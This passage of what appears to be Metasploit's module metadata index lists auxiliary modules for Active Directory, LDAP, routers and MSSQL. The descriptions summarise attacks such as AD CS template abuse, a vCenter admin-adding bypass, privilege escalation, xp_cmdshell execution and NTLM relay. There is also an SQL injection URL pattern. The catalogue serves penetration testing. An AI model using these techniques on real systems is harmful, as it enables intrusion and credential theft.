"URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py", - "URL-https://tools.ietf.org/html/rfc4120", - "URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html", - "URL-https://github.com/gentilkiwi/kekeo", - "URL-https://github.com/rvazarkar/KrbCredExport" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-09-28 22:28:54 +0000", - "path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/ticket_converter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/ldap/ad_cs_cert_template": { - "name": "AD CS Certificate Template Management", - "fullname": "auxiliary/admin/ldap/ad_cs_cert_template", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Will Schroeder", - "Lee Christensen", - "Oliver Lyak", - "Spencer McIntyre" - ], - "description": "This module can create, read, update, and delete AD CS certificate templates from a Active Directory Domain\n Controller.\n\n The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be\n restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data\n file to be specified to define the attributes. Template data files are provided to create a template that is\n vulnerable to ESC1, ESC2, ESC3 and ESC15.\n\n This module is capable of exploiting ESC4.", - "references": [ - "URL-https://github.com/GhostPack/Certify", - "URL-https://github.com/ly4k/Certipy" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-13 16:46:31 +0000", - "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb", - "is_install_path": true, - "ref_name": "admin/ldap/ad_cs_cert_template", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [], - "AKA": [ - "Certifry", - "Certipy" - ] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "CREATE", - "description": "Create the certificate template" - }, - { - "name": "DELETE", - "description": "Delete the certificate template" - }, - { - "name": "READ", - "description": "Read the certificate template" - }, - { - "name": "UPDATE", - "description": "Modify the certificate template" - } - ] - }, - "auxiliary_admin/ldap/change_password": { - "name": "Change Password", - "fullname": "auxiliary/admin/ldap/change_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "smashery" - ], - "description": "This module allows Active Directory users to change their own passwords, or reset passwords for\n accounts they have privileges over.", - "references": [ - "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py", - "URL-https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-12-06 16:47:25 +0000", - "path": "/modules/auxiliary/admin/ldap/change_password.rb", - "is_install_path": true, - "ref_name": "admin/ldap/change_password", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "CHANGE", - "description": "Change the user's password, knowing the existing password" - }, - { - "name": "RESET", - "description": "Reset a target user's password, having permissions over their account" - } - ] - }, - "auxiliary_admin/ldap/rbcd": { - "name": "Role Base Constrained Delegation", - "fullname": "auxiliary/admin/ldap/rbcd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Podalirius", - "Charlie Bromberg", - "Spencer McIntyre" - ], - "description": "This module can read and write the necessary LDAP attributes to configure a particular object for Role Based\n Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account\n specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the\n authenticated user must have write access to the target object (the object specified in DELEGATE_TO).", - "references": [ - "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution", - "URL-https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd", - "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-13 16:46:31 +0000", - "path": "/modules/auxiliary/admin/ldap/rbcd.rb", - "is_install_path": true, - "ref_name": "admin/ldap/rbcd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "FLUSH", - "description": "Delete the security descriptor" - }, - { - "name": "READ", - "description": "Read the security descriptor" - }, - { - "name": "REMOVE", - "description": "Remove matching ACEs from the security descriptor DACL" - }, - { - "name": "WRITE", - "description": "Add an ACE to the security descriptor DACL" - } - ] - }, - "auxiliary_admin/ldap/shadow_credentials": { - "name": "Shadow Credentials", - "fullname": "auxiliary/admin/ldap/shadow_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Elad Shamir", - "smashery" - ], - "description": "This module can read and write the necessary LDAP attributes to configure a particular account with a\n Key Credential Link. This allows weaponising write access to a user account by adding a certificate\n that can subsequently be used to authenticate. In order for this to succeed, the authenticated user\n must have write access to the target object (the object specified in TARGET_USER).", - "references": [ - "URL-https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", - "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-05-02 13:57:13 +0000", - "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb", - "is_install_path": true, - "ref_name": "admin/ldap/shadow_credentials", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add a credential to the account" - }, - { - "name": "FLUSH", - "description": "Delete all certificate entries" - }, - { - "name": "LIST", - "description": "Read all credentials associated with the account" - }, - { - "name": "REMOVE", - "description": "Remove matching certificate entries from the account object" - } - ] - }, - "auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": { - "name": "VMware vCenter Server vmdir Authentication Bypass", - "fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-04-09", - "type": "auxiliary", - "author": [ - "Hynek Petrak", - "JJ Lehmann", - "Ofri Ziv", - "wvu " - ], - "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. It will add an\n arbitrary administrator user the same way.", - "references": [ - "CVE-2020-3952", - "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/", - "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html", - "URL-https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md" - ], - "platform": "", - "arch": "", - "rport": 636, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-05-02 13:57:13 +0000", - "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "Add", - "description": "Add an admin user" - } - ] - }, - "auxiliary_admin/maxdb/maxdb_cons_exec": { - "name": "SAP MaxDB cons.exe Remote Command Injection", - "fullname": "auxiliary/admin/maxdb/maxdb_cons_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-01-09", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "SAP MaxDB is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", - "references": [ - "OSVDB-40210", - "BID-27206", - "CVE-2008-0244" - ], - "platform": "", - "arch": "", - "rport": 7210, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb", - "is_install_path": true, - "ref_name": "admin/maxdb/maxdb_cons_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/misc/sercomm_dump_config": { - "name": "SerComm Device Configuration Dump", - "fullname": "auxiliary/admin/misc/sercomm_dump_config", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-31", - "type": "auxiliary", - "author": [ - "Eloi Vanderbeken ", - "Matt \"hostess\" Andreko " - ], - "description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.", - "references": [ - "OSVDB-101653", - "URL-https://github.com/elvanderb/TCP-32764" - ], - "platform": "", - "arch": "", - "rport": 32764, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb", - "is_install_path": true, - "ref_name": "admin/misc/sercomm_dump_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/misc/wol": { - "name": "UDP Wake-On-Lan (WOL)", - "fullname": "auxiliary/admin/misc/wol", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sinn3r " - ], - "description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-03-05 04:43:37 +0000", - "path": "/modules/auxiliary/admin/misc/wol.rb", - "is_install_path": true, - "ref_name": "admin/misc/wol", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/motorola/wr850g_cred": { - "name": "Motorola WR850G v4.03 Credentials", - "fullname": "auxiliary/admin/motorola/wr850g_cred", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-09-24", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. A lot\n more information is available through this request, but\n you can get it all and more after logging in.", - "references": [ - "CVE-2004-1550", - "OSVDB-10232", - "URL-https://seclists.org/bugtraq/2004/Sep/0339.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb", - "is_install_path": true, - "ref_name": "admin/motorola/wr850g_cred", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/ms/ms08_059_his2006": { - "name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability", - "fullname": "auxiliary/admin/ms/ms08_059_his2006", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-14", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.", - "references": [ - "MSB-MS08-059", - "CVE-2008-3466", - "OSVDB-49068", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745" - ], - "platform": "", - "arch": "", - "rport": 0, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb", - "is_install_path": true, - "ref_name": "admin/ms/ms08_059_his2006", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum": { - "name": "Microsoft SQL Server Configuration Enumerator", - "fullname": "auxiliary/admin/mssql/mssql_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Carlos Perez " - ], - "description": "This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum_domain_accounts": { - "name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration", - "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind ", - "antti " - ], - "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated\n accounts can then be used in online dictionary attacks.", - "references": [ - "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum_domain_accounts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": { - "name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", - "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind ", - "antti " - ], - "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", - "references": [ - "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum_sql_logins": { - "name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", - "fullname": "auxiliary/admin/mssql/mssql_enum_sql_logins", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.", - "references": [ - "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2023-12-12 09:53:37 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum_sql_logins", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_dbowner": { - "name": "Microsoft SQL Server Escalate Db_Owner", - "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.", - "references": [ - "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_dbowner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": { - "name": "Microsoft SQL Server SQLi Escalate Db_Owner", - "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", - "references": [ - "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_dbowner_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_execute_as": { - "name": "Microsoft SQL Server Escalate EXECUTE AS", - "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_execute_as", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": { - "name": "Microsoft SQL Server SQLi Escalate Execute AS", - "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_execute_as_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_exec": { - "name": "Microsoft SQL Server Command Execution", - "fullname": "auxiliary/admin/mssql/mssql_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "tebo ", - "arcc " - ], - "description": "This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the\n sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is\n required to use this module.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx", - "URL-https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_findandsampledata": { - "name": "Microsoft SQL Server Find and Sample Data", - "fullname": "auxiliary/admin/mssql/mssql_findandsampledata", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Scott Sutherland ", - "Robin Wood ", - "humble-desser ", - "Carlos Perez ", - "hdm ", - "todb " - ], - "description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.", - "references": [ - "URL-http://www.netspi.com/blog/author/ssutherland/" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_findandsampledata", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_idf": { - "name": "Microsoft SQL Server Interesting Data Finder", - "fullname": "auxiliary/admin/mssql/mssql_idf", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Robin Wood " - ], - "description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n This module has been tested against the latest SQL Server 2019 docker container image (22/04/2021).", - "references": [ - "URL-http://www.digininja.org/metasploit/mssql_idf.php" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_idf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_ntlm_stealer": { - "name": "Microsoft SQL Server NTLM Stealer", - "fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.", - "references": [ - "URL-https://en.wikipedia.org/wiki/SMBRelay" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_ntlm_stealer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": { - "name": "Microsoft SQL Server SQLi NTLM Stealer", - "fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind ", - "Antti " - ], - "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.", - "references": [ - "URL-https://en.wikipedia.org/wiki/SMBRelay" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_ntlm_stealer_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_sql": { - "name": 